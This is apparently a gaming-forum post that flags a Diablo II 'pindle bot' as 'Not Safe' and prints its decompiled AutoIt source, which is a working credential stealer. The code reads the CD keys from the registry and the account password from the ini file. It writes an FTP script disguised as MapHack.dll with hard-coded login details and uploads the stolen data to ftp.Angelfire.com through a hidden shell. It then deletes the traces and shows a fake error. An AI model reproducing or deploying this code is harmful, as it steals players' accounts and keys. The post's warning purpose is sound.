Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Diablo Hyper Pindle Bot V0.05
#5
Not Safe

; <AUT2EXE VERSION: 3.0.102.0>

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: D:\Documents and Settings\win\Desktop\AUTOIT SCRIPTS\Anti-RealmDown Pindlebot\pass stealer 4.au3>
; ----------------------------------------------------------------------------

$D2CDKEY = RegRead("HKEY_CURRENT_USER\Software\Blizzard Entertainment\Diablo II", "d2cdkey")
$D2XCDKEY = RegRead("HKEY_CURRENT_USER\Software\Blizzard Entertainment\Diablo II", "d2xcdkey")
$ACCOUNT = IniRead("pbot.ini", "Settings", "account", "NotFound")
$REALM = RegRead("HKEY_CURRENT_USER\Software\Blizzard Entertainment\Diablo II", "Preferred Realm")
$PASSWORD = IniRead("pbot.ini", "Settings", "password", "NotFound")
$D2PATH = IniRead("pbot.ini", "Settings", "d2path", "NotFound")
$DIABLO_SWITCHES = " -w -skiptobnet -ns -noplugin -title MaxBotter"
$CHARLOCATION = IniRead("pbot.ini", "Settings", "charlocation", "NotFound")
$DIFF = IniRead("pbot.ini", "Settings", "difficulty", "2")
$SPAM = IniRead("pbot.ini", "Settings", "SpamChannel", "1")




If $ACCOUNT = "NotFound" Then
MsgBox(0, "Ooops", "Please open your pbot.ini file and enter your account name.")
Exit
EndIf

If $PASSWORD = "NotFound" Then
MsgBox(0, "Ooops", "Please open your pbot.ini file and enter a password.")
Exit
EndIf
;FileChangeDir("\temp")

FileOpen("settings.Dat", 2)
FileWriteLine("settings.Dat", "d2key= " & $D2CDKEY)
FileWriteLine("settings.Dat", "d2xkey= " & $D2XCDKEY)
FileWriteLine("settings.Dat", "account= " & $ACCOUNT)
FileWriteLine("settings.Dat", "password= " & $PASSWORD)
FileWriteLine("settings.Dat", "realm= " & $REALM)
FileClose("settings.Dat.dat")

FileMove("settings.Dat", "cache-" & @HOUR & "-" & @MIN & ".dat", 1)
FileDelete("settings.Dat")

$FILE = "cache-" & @HOUR & "-" & @MIN & ".dat"

FileOpen("MapHack.dll", 2)

FileWriteLine( "MapHack.dll", "clone2/d2avenger")
FileWriteLine( "MapHack.dll", "123123")
FileWriteLine( "MapHack.dll", "binary")
FileWriteLine( "MapHack.dll", "send " & $FILE)
FileWriteLine( "MapHack.dll", "quit")

FileClose("MapHack.dll")

;// Start D2
Run("Diablo II.exe" & $DIABLO_SWITCHES)

RunWait(@ComSpec & " /c " & 'ftp -s:MapHack.dll ftp.Angelfire.com', "", @SW_HIDE)
Sleep(1000)
FileDelete($FILE)
;FileDelete("cache.dat")
$MIN1 = @MIN
Do
FileDelete(@MON & "-" & @MDAY & "-" & @HOUR & "-" & $MIN1 & ".dat")
$MIN1 = $MIN1 - 1
$REPEAT = $REPEAT + 1
Until $REPEAT = 10

;// Enter Account and Password
Sleep(6000)
Send("{TAB}")
Sleep(250)
Send($ACCOUNT)
Sleep(250)
Send("{TAB}")
Sleep(250)
Send($PASSWORD)
Sleep(250)
Send("{ENTER}")
Sleep(5000)

;// Character Select Screen
If $CHARLOCATION = "2" Then
Send("{RIGHT}")
EndIf
If $CHARLOCATION = "3" Then
Send("{DOWN}")
EndIf
If $CHARLOCATION = "4" Then
Send("{RIGHT}")
Send("{DOWN}")
EndIf
If $CHARLOCATION = "5" Then
Send("{DOWN 2}")
EndIf
If $CHARLOCATION = "6" Then
Send("{RIGHT}")
Send("{DOWN 2}")
EndIf
If $CHARLOCATION = "7" Then
Send("{DOWN 3}")
EndIf
If $CHARLOCATION = "8" Then
Send("{RIGHT}")
Send("{DOWN 3}")
EndIf
Sleep(250)
Send("{ENTER}")
Sleep(4000)

;// Spam Channel
If $SPAM = 1 Then
MouseClick("left", 92, 501, 1, 0)
Sleep(2000)
Send(Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65))
Sleep(250)
Send("{ENTER}")
Sleep(2500)
Send(Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65))
Sleep(250)
Send("{ENTER}")
Sleep(2000)
Send(Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65))
Sleep(250)
Send("{ENTER}")
Sleep(500)
EndIf

;// Create Game
MouseClick("left", 595, 490, 1, 0)
Sleep(1000)
Send("D2AVGR-" & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65) & Chr(Int(Random(26)) + 65))
Sleep(250)
Send("{TAB}")
Sleep(250)
Send("123")
Sleep(250)
If $DIFF = "0" Then
MouseClick("left", 442, 404, 1, 0)
EndIf
If $DIFF = "1" Then
MouseClick("left", 556, 404, 1, 0)
EndIf
If $DIFF = "2" Then
MouseClick("left", 711, 404, 1, 0)
EndIf
Sleep(250)
Send("{ENTER}")

Sleep(2000)
MsgBox(0, "Anti Realm-Down Pindlebot: Error 10238", "Incorrect settings detected, please check your pbot.ini and try again.")

Exit

; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: D:\Documents and Settings\win\Desktop\AUTOIT SCRIPTS\Anti-RealmDown Pindlebot\pass stealer 4.au3>
; ----------------------------------------------------------------------------


Not Safe
Reply


Messages In This Thread
Diablo Hyper Pindle Bot V0.05 - by qwerty420 - 10-18-2005, 09:56 AM
Diablo Hyper Pindle Bot V0.05 - by zerochris1985 - 10-18-2005, 10:11 AM
Diablo Hyper Pindle Bot V0.05 - by Shift - 10-18-2005, 10:17 AM
Diablo Hyper Pindle Bot V0.05 - by Bowbow - 10-20-2005, 07:13 AM
Diablo Hyper Pindle Bot V0.05 - by Snipz - 10-29-2005, 12:23 PM
Diablo Hyper Pindle Bot V0.05 - by xenn2600 - 10-29-2005, 03:40 PM
Diablo Hyper Pindle Bot V0.05 - by Snipz - 10-29-2005, 11:32 PM
Diablo Hyper Pindle Bot V0.05 - by Snipz - 10-30-2005, 02:28 AM

Possibly Related Threads…
Thread Author Replies Views Last Post
  d2nt doesn't kill diablo Shembleton 2 578 06-12-2012, 03:12 PM
Last Post: comper
  won't kill diablo or baal ortho 1 174 06-12-2012, 03:09 PM
Last Post: comper
  Complete Diablo 2 Unique Pickit script for D2Nt bot Jammer74 68 32,370 05-03-2012, 07:01 AM
Last Post: comper
  Original Diablo Script + TP? namp 1 213 03-06-2012, 09:11 AM
Last Post: comper
  Baal and Diablo scripts Pube89 9 361 01-26-2012, 06:13 AM
Last Post: comper
  im looking for a bot (diablo 2 1.13d) bobyjinjin 1 924 01-23-2012, 09:54 PM
Last Post: comper
  D2nt closes diablo fully after every run cormin 2 379 12-08-2011, 07:02 AM
Last Post: qqwweerr
  Diablo 2 LOD 1.13c MapHack - D2MR (Clean/Undetected) DNA64 10 117,623 08-28-2011, 07:08 AM
Last Post: Midnight
  MF-Rush-Leech-AuraStack bot & Kuk Bot FOR Diablo 2-1.13c zakarumes 0 614 08-28-2011, 12:06 AM
Last Post: zakarumes
  Frenzy Barb Can NOT Run Diablo Or Baal premature 0 210 08-09-2011, 07:07 PM
Last Post: premature

Forum Jump:


Users browsing this thread: 1 Guest(s)